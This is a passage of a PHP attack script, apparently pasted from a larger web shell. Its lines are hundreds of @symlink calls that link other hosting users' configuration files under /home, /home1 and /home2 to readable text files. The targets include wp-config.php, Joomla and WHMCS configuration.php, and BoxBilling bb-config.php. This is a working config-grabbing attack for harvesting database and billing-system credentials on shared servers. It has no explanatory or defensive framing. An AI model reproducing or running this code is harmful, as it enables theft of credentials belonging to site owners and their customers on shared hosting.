  1319. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1320. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1321. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1322. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1323. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1324. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1325. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1326. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1327. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1328. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1329. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1330. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1331. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1332. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1333. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1334. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1335. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1336. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1337. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1338. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1339. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1340. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1341. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1342. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1343. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1344. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1345. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1346. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1347. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1348. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1349. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1350. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1351. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1352. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1353. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1354. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1355. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1356. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1357. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1358. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1359. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1360. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1361. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1362. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1363. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1364. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1365. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1366. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1367. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1368. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1369. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1370. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1371. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1372. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1373. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1374. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1375. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1376. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1377. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1378. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1379. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1380. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1381. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1382. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1383. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1384. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1385. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1386. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1387. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1388. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1389. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1390. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1391. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1392. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1393. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1394. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1395. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1396. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1397. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1398. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1399. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1400. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1401. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1402. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1403. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1404. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1405. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1406. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1407. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1408. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1409. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1410. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1411. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1412. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1413. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1414. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1415. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1416. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1417. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1418. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1419. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1420. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1421. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1422. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1423. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1424. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1425. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1426. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1427. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1428. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1429. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1430. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1431. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1432. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1433. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1434. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1435. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1436. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1437.  
  1438. //Home1
  1439.  
  1440. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1441. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1442. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1443. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1444. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1445. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1446. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1447. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1448. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1449. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1450. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1451. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1452. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1453. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1454. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1455. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1456. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1457. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1458. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1459. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1460. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1461. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1462. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1463. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1464. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1465. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1466. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1467. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1468. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1469. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1470. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1471. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1472. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1473. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1474. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1475. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1476. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1477. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1478. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1479. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1480. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1481. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1482. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1483. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1484. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1485. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1486. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1487. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1488. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1489. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1490. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1491. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1492. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1493. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1494. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1495. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1496. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1497. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1498. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1499. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1500. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1501. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1502. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1503. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1504. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1505. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1506. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1507. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1508. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1509. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1510. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1511. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1512. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1513. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1514. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1515. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1516. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1517. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1518. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1519. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1520. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1521. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1522. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1523. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1524. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1525. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1526. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1527. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1528. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1529. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1530. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1531. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1532. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1533. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1534. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1535. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1536. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1537. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1538. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1539. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1540. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1541. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1542. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1543. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1544. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1545. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1546. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1547. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1548. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1549. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1550. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1551. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1552. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1553. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1554. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1555. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1556. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1557. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1558. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1559. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1560. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1561. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1562. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1563. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1564. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1565. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1566. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1567. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1568. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1569. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1570. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1571. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1572. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1573. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1574. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1575. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1576. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1577. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1578. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1579. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1580. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1581. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1582. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1583. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1584. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1585. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1586. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1587. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1588. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1589. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1590. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1591. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1592. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1593. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1594. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1595. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1596. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1597. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1598. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1599. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1600. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1601. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1602. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1603. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1604. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1605. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1606. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1607. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1608. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1609. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1610. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1611. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1612. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1613. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1614. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1615. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1616. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1617. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1618. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1619. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1620.  
  1621. //Home2
  1622.  
  1623. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1624. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1625. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1626. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1627. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
